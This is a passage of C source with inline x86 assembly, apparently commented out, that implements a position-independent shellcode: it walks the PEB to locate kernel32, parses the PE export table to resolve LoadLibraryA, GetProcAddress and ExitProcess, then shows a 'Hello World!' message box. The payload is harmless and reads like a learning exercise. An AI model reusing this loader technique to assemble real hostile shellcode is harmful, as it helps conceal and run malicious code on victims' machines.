		mov esi, fs:[0x30];
		mov esi, [esi + 0x0C];
		mov esi, [esi + 0x1C];
		mov esi, [esi];//Get the second LDR_DATA_TABLE_ENTRY struct(Kernel32 or KernelBase 's)
		mov esi, [esi];
		mov esi, [esi + 0x8];
		mov[ebp + 0x8], esi;//lpDllBaseAddr


		//求LoadLibraryA 的地址
		push 0xC;
		mov edx, 0x8;
		add edx, ebx;
		push edx;
		mov esi, [ebp + 0x8];
		push esi;
		call fnGetProcAddress;
		mov[ebp + 0x10], eax;

		//求GetProcAddress 的地址
		push 0xE;
		mov edx, 0x15;
		add edx, ebx;
		push edx;
		push esi;
		call fnGetProcAddress;
		mov[ebp + 0xC], eax;


		//求ExitProcess 的地址
		push 0xB;
		mov edx, 0x24;
		add edx, ebx;
		push edx;
		mov esi, [ebp + 0x8];
		push esi;
		call fnGetProcAddress;
		mov[ebp + 0x14], eax;

		//加载user32.dll
		mov edx, 0x49;
		add edx, ebx;
		push edx;
		call[ebp + 0x10];

		//寻MessageBoxA的地址
		mov edx, 0x30;
		add edx, ebx;
		push edx;
		push eax;
		call[ebp + 0xC];
		mov[ebp + 0x18], eax;//存MessageBoxA的地址

		//MessageBox:"Hello World!"
		xor ecx, ecx;
		push ecx;
		mov edx, 0x3C;
		add edx, ebx;
		push edx;
		push edx;
		push ecx;
		call eax;

		//ExitProcess
		push ecx;
		call[ebp + 0x14];

		add ebp, 0x30;
		mov esp, ebp;
		pop ebp;
		ret 0x10;

	fnGetProcAddress://(LPVOID lpDllBaseAddr,char* pFuncName,int nFuncNameLen)
		push ebp;
		mov ebp, esp;
		pushad;
		sub esp, 0x20;

		mov esi, [ebp + 0x8];//Param 1

		//DllBase+0x3C->PEHead
		mov eax, [esi + 0x3C];//IMAGE_DOS_HEADER.e_lfanew -> eax
		lea esi, [esi + eax];//PE头VA
		mov[esp + 0x8], esi;//将PE头VA存入参数2

		//PEHead+0x78->ET
		mov esi, [esi + 0x78];//IMAGE_DIR...EXPORT.VirtualAddress
		add esi, [ebp + 0x8];//ET's VA
		mov[esp + 0xC], esi;//将ET's VA存入参数3

		//ET+0x1C->EAT
		mov edi, [esi + 0x1C];//IMAGE_EXP...ORY.AddressOfFunctions
		//lea edi, [edi + eax];//EAT's RVA
		add edi, [ebp + 0x8];//EAT's VA
		mov[esp + 0x10], edi;//将EAT's VA存入参数4

		//ET+0x20->ENT
		mov edi, [esi + 0x20];//IMAGE_EXP...ORY.AddressOfNames
		//lea edi, [edi + eax];//ENT's RVA
		add edi, [ebp + 0x8];//ENT's VA
		mov[esp + 0x14], edi;//将ENT's VA存入参数5

		//ET+0x24->EOT
		mov edi, [esi + 0x24];//IMAGE_EXP...ORY.AddressOfNameOrdinals
		//lea edi, [edi + eax];//EOT's RVA
		add edi, [ebp + 0x8];//EOT's VA
		mov[esp + 0x18], edi;//将EOT's VA存入参数6


		xor eax, eax;
		mov ebx, [ebp + 0x8];//Param 1
		jmp tag_FirstLoop;
	tag_FindLoop :
		inc eax;
	tag_FirstLoop:
		mov esi, [esp + 0x14];//取ENT's VA
		mov esi, [esi + 4 * eax];//下一个ENT RVA
		lea esi, [ebx + esi];//ENT's VA
		//add esi,ebx;
		mov edi, [ebp + 0xC];//edi=Param 2
		mov ecx, [ebp + 0x10];//ecx=Param 3
		cld;
		repe cmpsb;
		jne tag_FindLoop;

		//比对出对应序号:
		mov esi, [esp + 0x18];//将EOT's VA存入esi
		xor ebx, ebx;
		mov bx, [esi + eax * 2];//找到EOT中的序号

		mov edx, [esp + 0x10];//将EAT's VA存入edx
		mov esi, [edx + ebx * 4];//找到EAT中的函数地址

		mov eax, [ebp + 0x8];
		lea eax, [eax + esi];//对应函数的返回值

		mov[ebp + 0x8], eax;//保存在传入参数的位置

		add esp, 0x20;
		popad;
		mov esp, ebp;
		mov eax, [esp + 0x8];//回填返回值
		pop ebp;
		ret 0xC;
	}


	
	return 0;
}

*/